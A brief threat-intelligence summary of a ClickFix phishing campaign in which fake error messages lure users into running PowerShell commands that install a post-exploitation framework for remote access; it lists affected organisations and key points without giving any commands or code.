Summary: A newly discovered ClickFix phishing campaign deceives victims into executing malicious PowerShell commands that install the Havok post-exploitation framework, providing remote access to compromised devices. It employs social-engineering tactics, leading users to believe they must βfixβ a nonexistent error by running harmful scripts from a remote server. This method allows attackers to blend malicious activities with legitimate cloud communications, making detection difficult.
Affected: Organizations using Microsoft cloud services
Keypoints :
- Threat actors use fake error messages to entice users into downloading malicious PowerShell commands.
- The Havok framework, once installed, enables remote access and control over compromised devices.
- The campaign is evolving, with similar techniques used on social media platforms to trick users into executing harmful scripts.
Views: 11